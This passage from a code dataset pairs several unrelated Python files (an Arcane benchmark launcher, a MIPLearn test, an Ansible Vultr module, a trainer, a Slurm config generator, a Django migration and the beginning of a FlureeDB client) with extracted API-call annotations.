code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
#!/usr/bin/env python3
# Note: il faut au moins python 3.5 (pour subprocess.run())
import argparse
import subprocess
from string import Template
from argparse import RawDescriptionHelpFormatter
xstr = """<?xml version="1.0"?>
<case codename="ArcaneTest" xml:lang="en" codeversion="1.0">
<arcane>
<title>Tube a choc de Sod</title>
<timeloop>ArcaneHydroLoop</timeloop>
<modules>
<module name="ArcaneLoadBalance" active="$do_load_balance" />
</modules>
</arcane>
<meshes>
<mesh>
<ghost-layer-builder-version>4</ghost-layer-builder-version>
<generator name="Cartesian3D" >
<nb-part-x>$nb_part_x</nb-part-x>
<nb-part-y>$nb_part_y</nb-part-y>
<nb-part-z>$nb_part_z</nb-part-z>
<origin>1.0 2.0 3.0</origin>
<generate-sod-groups>true</generate-sod-groups>
<x><n>$nb_cell_x</n><length>2.0</length></x>
<y><n>$nb_cell_y</n><length>2.0</length></y>
<z><n>$nb_cell_z</n><length>4.0</length></z>
</generator>
<initialization>
<variable><name>Density</name><value>1.0</value><group>ZG</group></variable>
<variable><name>Density</name><value>0.125</value><group>ZD</group></variable>
<variable><name>Pressure</name><value>1.0</value><group>ZG</group></variable>
<variable><name>Pressure</name><value>0.1</value><group>ZD</group></variable>
<variable><name>AdiabaticCst</name><value>1.4</value><group>ZG</group></variable>
<variable><name>AdiabaticCst</name><value>1.4</value><group>ZD</group></variable>
</initialization>
</mesh>
</meshes>
<arcane-checkpoint>
<do-dump-at-end>false</do-dump-at-end>
</arcane-checkpoint>
<arcane-load-balance>
<active>true</active>
<partitioner name="Metis" />
<period>5</period>
<statistics>true</statistics>
<max-imbalance>0.01</max-imbalance>
<min-cpu-time>0</min-cpu-time>
</arcane-load-balance>
<!-- Configuration du module hydrodynamique -->
<simple-hydro>
<deltat-init>0.00001</deltat-init>
<deltat-min>0.000001</deltat-min>
<deltat-max>0.0001</deltat-max>
<final-time>0.2</final-time>
<viscosity>cell</viscosity>
<viscosity-linear-coef>.5</viscosity-linear-coef>
<viscosity-quadratic-coef>.6</viscosity-quadratic-coef>
<boundary-condition>
<surface>XMIN</surface><type>Vx</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>XMAX</surface><type>Vx</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>YMIN</surface><type>Vy</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>YMAX</surface><type>Vy</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>ZMIN</surface><type>Vz</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>ZMAX</surface><type>Vz</type><value>0.</value>
</boundary-condition>
</simple-hydro>
</case>
"""
epilog_doc = """
Ce script permet de spécifier et d'exécuter le test MicroHydro en MPI
sur N processeurs, chaque processeur ayant le même nombre de mailles.
Il permet donc des tests d'extensibilité faible (weak scaling).
Ce test doit s'exécuter dans le répertoire où Arcane a été compilé.
L'option '-n|--nb-proc' spécifie le nombre de processus. Si ce nombre
est supérieur à 32, il doit être un multiple de 32.
L'option '-s|--mesh-size' indique le nombre de chunks de mailles pour
chaque PE. La taille d'un chunk est de 2000 mailles. Par defaut le
nombre de chunk est de 10.
Il est possible de spécifier un repartitionnement via l'option
'-l|--loadbalance'. Dans ce cas, le repartitionnement aura lieu toutes
les 5 itérations. Arcane doit avec été compilé avec 'ParMetis' pour
que cela fonctionne.
"""
parser = argparse.ArgumentParser(description="MicroHydro bench",formatter_class=RawDescriptionHelpFormatter,epilog=epilog_doc)
required_arguments = parser.add_argument_group('required named arguments')
required_arguments.add_argument("-n","--nb-proc", dest="nb_proc", action="store", help="number of processus", type=int, required=True)
parser.add_argument("-s","--mesh-size", dest="mesh_size", action="store", help="size of mesh", type=int, default=10)
parser.add_argument("-l","--load-balance", dest="do_load_balance", action="store_true", help="true if load balance is activated")
parser.add_argument("-m","--max-iteration", dest="max_iteration", action="store", help="number of iteration to do", type=int, default=100)
parser.add_argument("-p","--arcane-driver-path", dest="arcane_driver_path", action="store", help="arcane_test_driver path", type=str, default="./bin/arcane_test_driver")
args = parser.parse_args()
nb_proc = args.nb_proc
nb_cell_mult = args.mesh_size
if nb_proc>32:
if nb_proc % 32 != 0:
raise RuntimeError("Bad number of proc (should be a multiple of 32)")
s = Template(xstr)
# Nombre de parties en (X,Y,Z). X*Y*Z doit etre egal au nombre de PE
nb_part_x = 8
nb_part_y = 4
nb_part_z = (nb_proc // 32)
# En dessous de 32 PE, on découpe de manière spécifique
if nb_proc==24:
nb_part_x, nb_part_y, nb_part_z = 4, 3, 2
elif nb_proc==16:
nb_part_x, nb_part_y, nb_part_z = 4, 2, 2
elif nb_proc==12:
nb_part_x, nb_part_y, nb_part_z = 3, 2, 2
elif nb_proc==8:
nb_part_x, nb_part_y, nb_part_z = 2, 2, 2
elif nb_proc==4:
nb_part_x, nb_part_y, nb_part_z = 2, 2, 1
elif nb_part_z==0:
nb_part_x, nb_part_y, nb_part_z = nb_proc, 1, 1
total_nb_part = nb_part_x * nb_part_y * nb_part_z
# Nombre de mailles en (X,Y,Z)
nb_cell_x = 20 * nb_part_x
nb_cell_y = 20 * nb_part_y
nb_cell_z = 5 * nb_part_z * nb_cell_mult
total_nb_cell = nb_cell_x * nb_cell_y * nb_cell_z
do_load_balance = "true" if args.do_load_balance else "false"
d = {
"nb_part_x" : nb_part_x, "nb_part_y" : nb_part_y, "nb_part_z" : nb_part_z,
"nb_cell_x" : nb_cell_x, "nb_cell_y" : nb_cell_y, "nb_cell_z" : nb_cell_z,
"do_load_balance" : do_load_balance
}
z = s.substitute(d)
print(z)
print("TotalNbCell=",total_nb_cell," (per part=",total_nb_cell//total_nb_part,")")
case_file = open("test.arc",mode="w")
case_file.write(z)
case_file.close()
command = [ args.arcane_driver_path, "launch", "-n", str(nb_proc), "-m", str(args.max_iteration), "-We,ARCANE_NEW_MESHINIT,1", "test.arc" ]
print(command)
subprocess.run(command)
|
[
"subprocess.run",
"argparse.ArgumentParser",
"string.Template"
] |
[((3830, 3954), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""MicroHydro bench"""', 'formatter_class': 'RawDescriptionHelpFormatter', 'epilog': 'epilog_doc'}), "(description='MicroHydro bench', formatter_class=\n RawDescriptionHelpFormatter, epilog=epilog_doc)\n", (3853, 3954), False, 'import argparse\n'), ((4919, 4933), 'string.Template', 'Template', (['xstr'], {}), '(xstr)\n', (4927, 4933), False, 'from string import Template\n'), ((6349, 6372), 'subprocess.run', 'subprocess.run', (['command'], {}), '(command)\n', (6363, 6372), False, 'import subprocess\n')]
|
# MIPLearn: Extensible Framework for Learning-Enhanced Mixed-Integer Optimization
# Copyright (C) 2020-2021, UChicago Argonne, LLC. All rights reserved.
# Released under the modified BSD license. See COPYING.md for more details.
import os.path
from scipy.stats import randint
from miplearn.benchmark import BenchmarkRunner
from miplearn.problems.stab import MaxWeightStableSetGenerator
from miplearn.solvers.learning import LearningSolver
def test_benchmark() -> None:
for n_jobs in [1, 4]:
# Generate training and test instances
generator = MaxWeightStableSetGenerator(n=randint(low=25, high=26))
train_instances = generator.generate(5)
test_instances = generator.generate(3)
# Solve training instances
training_solver = LearningSolver()
training_solver.parallel_solve(train_instances, n_jobs=n_jobs) # type: ignore
# Benchmark
test_solvers = {
"Strategy A": LearningSolver(),
"Strategy B": LearningSolver(),
}
benchmark = BenchmarkRunner(test_solvers)
benchmark.fit(train_instances, n_jobs=n_jobs) # type: ignore
benchmark.parallel_solve(
test_instances, # type: ignore
n_jobs=n_jobs,
n_trials=2,
)
benchmark.write_csv("/tmp/benchmark.csv")
assert os.path.isfile("/tmp/benchmark.csv")
assert benchmark.results.values.shape == (12, 21)
|
[
"miplearn.benchmark.BenchmarkRunner",
"scipy.stats.randint",
"miplearn.solvers.learning.LearningSolver"
] |
[((783, 799), 'miplearn.solvers.learning.LearningSolver', 'LearningSolver', ([], {}), '()\n', (797, 799), False, 'from miplearn.solvers.learning import LearningSolver\n'), ((1051, 1080), 'miplearn.benchmark.BenchmarkRunner', 'BenchmarkRunner', (['test_solvers'], {}), '(test_solvers)\n', (1066, 1080), False, 'from miplearn.benchmark import BenchmarkRunner\n'), ((959, 975), 'miplearn.solvers.learning.LearningSolver', 'LearningSolver', ([], {}), '()\n', (973, 975), False, 'from miplearn.solvers.learning import LearningSolver\n'), ((1003, 1019), 'miplearn.solvers.learning.LearningSolver', 'LearningSolver', ([], {}), '()\n', (1017, 1019), False, 'from miplearn.solvers.learning import LearningSolver\n'), ((600, 624), 'scipy.stats.randint', 'randint', ([], {'low': '(25)', 'high': '(26)'}), '(low=25, high=26)\n', (607, 624), False, 'from scipy.stats import randint\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2018, <NAME> <<EMAIL>>
# (c) 2019, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: vultr_ssh_key_info
short_description: Get information about the Vultr SSH keys available.
description:
- Get infos about SSH keys available.
version_added: "2.9"
author:
- "<NAME> (@Spredzy)"
- "<NAME> (@resmo)"
extends_documentation_fragment: vultr
'''
EXAMPLES = r'''
- name: Get Vultr SSH keys infos
vultr_ssh_key_info:
register: result
- name: Print the infos
debug:
var: result.vultr_ssh_key_info
'''
RETURN = r'''
---
vultr_api:
description: Response from Vultr API with a few additions/modification
returned: success
type: complex
contains:
api_account:
description: Account used in the ini file to select the key
returned: success
type: str
sample: default
api_timeout:
description: Timeout used for the API requests
returned: success
type: int
sample: 60
api_retries:
description: Amount of max retries for the API requests
returned: success
type: int
sample: 5
api_retry_max_delay:
description: Exponential backoff delay in seconds between retries up to this max delay value.
returned: success
type: int
sample: 12
version_added: '2.9'
api_endpoint:
description: Endpoint used for the API requests
returned: success
type: str
sample: "https://api.vultr.com"
vultr_ssh_key_info:
description: Response from Vultr API as list
returned: success
type: complex
contains:
id:
description: ID of the ssh key
returned: success
type: str
sample: 5904bc6ed9234
name:
description: Name of the ssh key
returned: success
type: str
sample: my ssh key
date_created:
description: Date the ssh key was created
returned: success
type: str
sample: "2017-08-26 12:47:48"
ssh_key:
description: SSH public key
returned: success
type: str
sample: "ssh-rsa AA... <EMAIL>"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vultr import (
Vultr,
vultr_argument_spec,
)
class AnsibleVultrSSHKeyInfo(Vultr):
def __init__(self, module):
super(AnsibleVultrSSHKeyInfo, self).__init__(module, "vultr_ssh_key_info")
self.returns = {
'SSHKEYID': dict(key='id'),
'name': dict(),
'ssh_key': dict(),
'date_created': dict(),
}
def get_sshkeys(self):
return self.api_query(path="/v1/sshkey/list")
def parse_keys_list(keys_list):
if not keys_list:
return []
return [key for id, key in keys_list.items()]
def main():
argument_spec = vultr_argument_spec()
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
sshkey_info = AnsibleVultrSSHKeyInfo(module)
result = sshkey_info.get_result(parse_keys_list(sshkey_info.get_sshkeys()))
module.exit_json(**result)
if __name__ == '__main__':
main()
|
[
"ansible.module_utils.vultr.vultr_argument_spec",
"ansible.module_utils.basic.AnsibleModule"
] |
[((3113, 3134), 'ansible.module_utils.vultr.vultr_argument_spec', 'vultr_argument_spec', ([], {}), '()\n', (3132, 3134), False, 'from ansible.module_utils.vultr import Vultr, vultr_argument_spec\n'), ((3149, 3217), 'ansible.module_utils.basic.AnsibleModule', 'AnsibleModule', ([], {'argument_spec': 'argument_spec', 'supports_check_mode': '(True)'}), '(argument_spec=argument_spec, supports_check_mode=True)\n', (3162, 3217), False, 'from ansible.module_utils.basic import AnsibleModule\n')]
|
import os
import torch
from tqdm import tqdm
from .base import BaseAgent
from util.mylogger import get_writer
class Trainer(BaseAgent):
def __init__(self, config, args):
super().__init__(config, args)
if args.load != '':
self.ckpt_dir_flag, self.train_set, self.dev_set, self.train_loader, self.dev_loader = \
self.load_data(ckpt_path=args.load,
dataset_config=config.dataset,
dataloader_config=config.dataloader,
njobs=args.njobs)
self.model_state, self.step_fn = self.build_model(config.build)
self.model_state = self.load_model(self.model_state, args.load)
else:
self.ckpt_dir_flag, self.train_set, self.dev_set, self.train_loader, self.dev_loader = \
self.gen_data(ckpt_path=config.ckpt_dir, flag=config.flag,
dataset_config=config.dataset,
dataloader_config=config.dataloader,
njobs=args.njobs)
self.model_state, self.step_fn = self.build_model(config.build)
# use customed logger
# eg. wandb, tensorboard
self.writer = get_writer(config, args, self.ckpt_dir_flag)
def build_model(self, build_config):
return super().build_model(build_config, mode='train', device=self.device)
# ====================================================
# train
# ====================================================
def train(self, total_steps, verbose_steps, log_steps, save_steps, eval_steps):
while self.model_state['steps'] <= total_steps:
train_bar = tqdm(self.train_loader)
for data in train_bar:
self.model_state['steps'] += 1
meta = self.step_fn(self.model_state, data)
if self.model_state['steps'] % log_steps == 0:
if self.writer is None:
print('* self.writer is not implemented.')
else:
# self.writer.log(meta['log'], step=self.model_state['steps'])
mels = meta['mels']
_data = {}
for k, v in mels.items():
if v.shape[1] != 80:
v = torch.nn.functional.interpolate(v.transpose(1,2), 80).transpose(1,2)
_data[k] = (v.cpu().numpy()/5+1, self.mel2wav(v))
# self.writer.mels_summary(
# tag='train/seen',
# data=_data,
# sample_rate=22050,
# step=self.model_state['steps']
# )
if self.model_state['steps'] % verbose_steps == 0:
meta['log']['steps'] = self.model_state['steps']
train_bar.set_postfix(meta['log'])
if self.model_state['steps'] % save_steps == 0:
self.save_model(self.model_state, \
os.path.join(self.ckpt_dir_flag, f'steps_{self.model_state["steps"]}.pth'))
if self.model_state['steps'] % eval_steps == 0 and self.model_state['steps'] != 0:
self.evaluate()
# ====================================================
# evaluate
# ====================================================
def evaluate(self):
try:
data = next(self.dev_iter)
except :
self.dev_iter = iter(self.dev_loader)
data = next(self.dev_iter)
with torch.no_grad():
meta = self.step_fn(self.model_state, data, train=False)
mels = meta['mels']
_data = {}
for k, v in mels.items():
if v.shape[1] != 80:
v = torch.nn.functional.interpolate(v.transpose(1,2), 80).transpose(1,2)
_data[k] = (v.cpu().numpy()/5+1, self.mel2wav(v))
self.writer.mels_summary(
tag='dev/unseen',
data=_data,
sample_rate=22050,
step=self.model_state['steps']
)
|
[
"tqdm.tqdm",
"util.mylogger.get_writer",
"torch.no_grad",
"os.path.join"
] |
[((1193, 1237), 'util.mylogger.get_writer', 'get_writer', (['config', 'args', 'self.ckpt_dir_flag'], {}), '(config, args, self.ckpt_dir_flag)\n', (1203, 1237), False, 'from util.mylogger import get_writer\n'), ((1659, 1682), 'tqdm.tqdm', 'tqdm', (['self.train_loader'], {}), '(self.train_loader)\n', (1663, 1682), False, 'from tqdm import tqdm\n'), ((3656, 3671), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3669, 3671), False, 'import torch\n'), ((3115, 3189), 'os.path.join', 'os.path.join', (['self.ckpt_dir_flag', 'f"""steps_{self.model_state[\'steps\']}.pth"""'], {}), '(self.ckpt_dir_flag, f"steps_{self.model_state[\'steps\']}.pth")\n', (3127, 3189), False, 'import os\n')]
|
#! /opt/cloud_sdk/bin/python
import re
from typing import Dict, Optional
import yaml
import citc.utils
def load_yaml(filename) -> dict:
with open(filename, "r") as f:
return yaml.safe_load(f)
def get_limits() -> Dict[str, Dict[str, str]]:
"""
Until OCI has an API to fetch service limits, we have to hard-code
them in a file.
"""
return load_yaml("limits.yaml")
def get_shapes() -> Dict[str, Dict[str, str]]:
try:
return citc.utils.get_types_info()
except NotImplementedError:
return load_yaml("/etc/citc/shapes.yaml")
def get_mgmt_info() -> Dict[str, str]:
try:
return load_yaml("/etc/citc/mgmt_shape.yaml")
except FileNotFoundError:
return {}
def get_nodespace() -> Dict[str, Dict[str, str]]:
return load_yaml("/etc/citc/startnode.yaml")
def encode_nodename(shape_name: str, node_number: int, cluster_id: str, ad: Optional[int] = None) -> str:
if ad is not None:
return "{}-ad{}-{:0>4}".format(shape_name.lower().replace(".", "-"), ad, node_number)
else:
return "{}-{}-{:0>4}".format(cluster_id, shape_name.lower().replace(".", "-"), node_number)
def create_slurmconf_line(number: int, shape_info: Dict, shape: str, cluster_id, ad: Optional[int] = None):
nodename = encode_nodename(shape, number, cluster_id, ad)
arch = shape_info.get("arch", "x86_64")
features = "shape={shape},ad={ad},arch={arch},pg={pg}".format(shape=shape, ad=ad, arch=arch, pg=shape_info.get("cluster_group", False))
config_template = 'NodeName={nodename:40} State={state:7} SocketsPerBoard={sockets:<1} CoresPerSocket={cores_per_socket:<3} ThreadsPerCore={threads_per_core:<1} RealMemory={memory:<10} Gres="{gres}" Features="{features}"'
config = config_template.format(
nodename=nodename,
state="CLOUD",
sockets=shape_info.get("sockets", 1),
cores_per_socket=shape_info["cores_per_socket"],
threads_per_core=shape_info.get("threads_per_core", 1),
memory=shape_info["memory"],
gres=shape_info.get("gres", ""),
features=features,
)
return config
def get_node_configs(limits, shapes, mgmt_info, nodespace):
for shape, shape_counts in limits.items():
try:
shape_info = shapes[shape]
except KeyError as e:
print("Error: Could not find shape information for {}. \nPlease log a ticket at https://github.com/clusterinthecloud/terraform/issues/new".format(e))
continue
if isinstance(shape_counts, int):
for i in range(1, shape_counts+1):
yield create_slurmconf_line(i, shape_info, shape, nodespace["cluster_id"])
else:
for ad, ad_count in shape_counts.items():
if mgmt_info and shape == mgmt_info["mgmt_shape"] and ad == mgmt_info["mgmt_ad"]:
ad_count -= 1
for i in range(1, ad_count+1):
yield create_slurmconf_line(i, shape_info, shape, nodespace["cluster_id"], ad)
# TODO Make sure that any nodes which are no longer managed due to service limit reductions are terminated.
slurm_conf_filename = "/mnt/shared/etc/slurm/slurm.conf"
node_config = "\n".join(get_node_configs(get_limits(), get_shapes(), get_mgmt_info(), get_nodespace()))
chop = re.compile('(?<=# STARTNODES\n)(.*?)(?=\n?# ENDNODES)', re.DOTALL)
with open(slurm_conf_filename) as f:
all_config = f.read()
new_config = chop.sub('{}'.format(node_config), all_config)
with open(slurm_conf_filename, "w") as f:
f.write(new_config)
|
[
"yaml.safe_load",
"re.compile"
] |
[((3318, 3386), 're.compile', 're.compile', (['"""(?<=# STARTNODES\n)(.*?)(?=\n?# ENDNODES)"""', 're.DOTALL'], {}), '("""(?<=# STARTNODES\n)(.*?)(?=\n?# ENDNODES)""", re.DOTALL)\n', (3328, 3386), False, 'import re\n'), ((190, 207), 'yaml.safe_load', 'yaml.safe_load', (['f'], {}), '(f)\n', (204, 207), False, 'import yaml\n')]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-17 21:02
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Actor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=100)),
('last_name', models.CharField(max_length=100)),
('image', models.ImageField(blank=True, null=True, upload_to='actor/')),
],
options={
'ordering': ['last_name', 'first_name'],
'verbose_name': 'Actor',
'verbose_name_plural': 'Actors',
},
),
migrations.CreateModel(
name='Cast',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=250)),
('description', models.TextField(blank=True)),
('image', models.ImageField(blank=True, null=True, upload_to='casts/')),
('actor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.Actor')),
],
options={
'ordering': ['name'],
'verbose_name': 'Cast',
'verbose_name_plural': 'Casts',
},
),
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.CharField(max_length=30)),
('email', models.EmailField(max_length=254)),
('address', models.TextField(blank=True)),
('actor', models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='contact_information', to='store.Actor')),
],
),
migrations.CreateModel(
name='Movie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=250)),
('year', models.PositiveIntegerField()),
('description', models.TextField()),
('image', models.ImageField(blank=True, null=True, upload_to='movies/')),
],
options={
'ordering': ['-year', 'name'],
'verbose_name': 'Movie',
'verbose_name_plural': 'Movies',
},
),
migrations.AddField(
model_name='cast',
name='movie',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.Movie'),
),
]
|
[
"django.db.models.TextField",
"django.db.models.OneToOneField",
"django.db.models.ForeignKey",
"django.db.models.CharField",
"django.db.models.PositiveIntegerField",
"django.db.models.AutoField",
"django.db.models.ImageField",
"django.db.models.EmailField"
] |
[((2948, 3033), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""store.Movie"""'}), "(on_delete=django.db.models.deletion.CASCADE, to='store.Movie'\n )\n", (2965, 3033), False, 'from django.db import migrations, models\n'), ((398, 491), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (414, 491), False, 'from django.db import migrations, models\n'), ((521, 553), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (537, 553), False, 'from django.db import migrations, models\n'), ((586, 618), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (602, 618), False, 'from django.db import migrations, models\n'), ((647, 707), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'null': '(True)', 'upload_to': '"""actor/"""'}), "(blank=True, null=True, upload_to='actor/')\n", (664, 707), False, 'from django.db import migrations, models\n'), ((1021, 1114), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (1037, 1114), False, 'from django.db import migrations, models\n'), ((1138, 1170), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(250)'}), '(max_length=250)\n', (1154, 1170), False, 'from django.db import migrations, models\n'), ((1205, 1233), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)'}), '(blank=True)\n', (1221, 1233), False, 'from django.db import migrations, models\n'), ((1262, 1322), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'null': '(True)', 'upload_to': '"""casts/"""'}), "(blank=True, null=True, upload_to='casts/')\n", (1279, 1322), False, 'from django.db import migrations, models\n'), ((1351, 1436), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""store.Actor"""'}), "(on_delete=django.db.models.deletion.CASCADE, to='store.Actor'\n )\n", (1368, 1436), False, 'from django.db import migrations, models\n'), ((1727, 1820), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (1743, 1820), False, 'from django.db import migrations, models\n'), ((1845, 1876), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (1861, 1876), False, 'from django.db import migrations, models\n'), ((1905, 1938), 'django.db.models.EmailField', 'models.EmailField', ([], {'max_length': '(254)'}), '(max_length=254)\n', (1922, 1938), False, 'from django.db import migrations, models\n'), ((1969, 1997), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)'}), '(blank=True)\n', (1985, 1997), False, 'from django.db import migrations, models\n'), ((2026, 2166), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'editable': '(False)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""contact_information"""', 'to': '"""store.Actor"""'}), "(editable=False, on_delete=django.db.models.deletion.\n CASCADE, related_name='contact_information', to='store.Actor')\n", (2046, 2166), False, 'from django.db import migrations, models\n'), ((2292, 2385), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (2308, 2385), False, 'from django.db import migrations, models\n'), ((2409, 2441), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(250)'}), '(max_length=250)\n', (2425, 2441), False, 'from django.db import migrations, models\n'), ((2469, 2498), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {}), '()\n', (2496, 2498), False, 'from django.db import migrations, models\n'), ((2533, 2551), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (2549, 2551), False, 'from django.db import migrations, models\n'), ((2580, 2641), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'null': '(True)', 'upload_to': '"""movies/"""'}), "(blank=True, null=True, upload_to='movies/')\n", (2597, 2641), False, 'from django.db import migrations, models\n')]
|
#!/usr/bin/python3
# pylint: disable=too-few-public-methods
# pylint: disable=too-many-arguments
# pylint: disable=too-many-instance-attributes
# pylint: disable=simplifiable-if-statement
"""Basic asynchonous client library for FlureeDB"""
import sys
import asyncio
import json
import time
import aiohttp
from aioflureedb.signing import DbSigner
from aioflureedb.domain_api import FlureeDomainAPI
class FlureeException(Exception):
"""Base exception class for aioflureedb"""
def __init__(self, message):
"""Constructor
Parameters
----------
message : str
Error message
"""
Exception.__init__(self, message)
class FlureeHttpError(FlureeException):
"""Non 200 HTTP response"""
def __init__(self, message, status):
"""Constructor
Parameters
----------
message : str
Error message
status : int
HTTP status code
"""
self.status = status
FlureeException.__init__(self, message)
class FlureeHalfCredentials(FlureeException):
"""Incomplete credentials"""
def __init__(self, message):
"""Constructor
Parameters
----------
message : str
Error message
"""
FlureeException.__init__(self, message)
class FlureeKeyRequired(FlureeException):
"""Endpoint invoked that requires signing but no signing key available"""
def __init__(self, message):
"""Constructor
Parameters
----------
message : str
Error message
"""
FlureeException.__init__(self, message)
class FlureeTransactionFailure(FlureeException):
"""Fluree transaction failed"""
def __init__(self, message):
"""Constructor
Parameters
----------
message : str
Error message
"""
FlureeException.__init__(self, message)
class FlureeUnexpectedPredicateNumber(FlureeException):
"""Fluree transaction failed"""
def __init__(self, message):
"""Constructor
Parameters
----------
message : str
Error message
"""
FlureeException.__init__(self, message)
_FLUREEQLQUERY_ENDPOINT_PERMISSIONS = {
'query': {
'permitted': {"select", "selectOne", "selectDistinct", "from", "where", "block", "prefixes", "vars", "opts"},
'depricated': {"filter", "union", "optional", "limit", "offset", "orderBy", "groupBy", "prettyPrint"}
},
'block': {
'permitted': {"block"},
'depricated': {'prettyPrint'}
},
'list_snapshots': {
'permitted': {},
'depricated': {}
},
'snapshot': {
'permitted': {},
'depricated': {}
}
}
class _FlureeQlSubQuery:
"""Helper class for FlureeQL multi-query syntactic sugar"""
def __init__(self, endpoint, method):
"""Constructor
Parameters
----------
endpoint : _FlureeQlEndpoint
API endpoint for communicating FlureeQL queries with FlureeDB
method : str
Name for the sub-query
"""
self.endpoint = endpoint
self.method = method
self.permittedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS["query"]['permitted']
self.depricatedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS["query"]['depricated']
def __call__(self, **kwargs):
"""FlureeQl query construction through keyword arguments
Parameters
----------
kwargs: dict
Keyword arguments for different parts of a FlureeQL query.
Raises
------
TypeError
If an unknown kwarg value is used.
"""
obj = {}
for key, value in kwargs.items():
if key == "ffrom":
key = "from"
if key == "ffilter":
key = "filter"
if key not in self.permittedkeys:
if key not in self.depricatedkeys:
raise TypeError("FlureeQuery got unexpected keyword argument '" + key + "'")
print("WARNING: Use of depricated FlureeQL syntax,",
key,
"should not be used as top level key in queries",
file=sys.stderr)
obj[key] = value
self.endpoint.multi_query[self.method] = obj
class _FlureeQlQuery:
"""Helper class for FlureeQL query syntactic sugar"""
def __init__(self, endpoint):
"""Constructor
Parameters
----------
endpoint : _FlureeQlEndpoint
API endpoint for communicating FlureeQL queries with FlureeDB
"""
self.endpoint = endpoint
self.permittedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS[endpoint.api_endpoint]['permitted']
self.depricatedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS[endpoint.api_endpoint]['depricated']
async def __call__(self, **kwargs):
"""FlureeQl query construction through keyword arguments
Parameters
----------
kwargs: dict
Keyword arguments for different parts of a FlureeQL query.
Raises
------
TypeError
If an unknown kwarg value is used.
Returns
-------
dict
json decode result from the server.
"""
obj = {}
for key, value in kwargs.items():
if key == "ffrom":
key = "from"
if key == "ffilter":
key = "filter"
if key not in self.permittedkeys:
if key not in self.depricatedkeys:
raise TypeError("FlureeQuery got unexpected keyword argument '" + key + "'")
print("WARNING: Use of depricated FlureeQL syntax,",
key,
"should not be used as top level key in queries",
file=sys.stderr)
obj[key] = value
return await self.endpoint.actual_query(obj)
async def raw(self, obj):
"""Use a readily constructed FlureeQL dictionary object to invoke the query API endpoint.
Parameters
----------
obj: dict
Complete FlureeQl query object.
Returns
-------
dict
json decode result from the server.
"""
return await self.endpoint.actual_query(obj)
class _UnsignedGetter:
"""Get info with a GET instead of a POST"""
def __init__(self, session, url, ssl_verify_disabled=False, ready=None):
"""Constructor
Parameters
----------
session : aiohttp.ClientSession
HTTP session for doing HTTP post/get with
url : string
URL of the API endpoint.
ssl_verify_disabled: bool
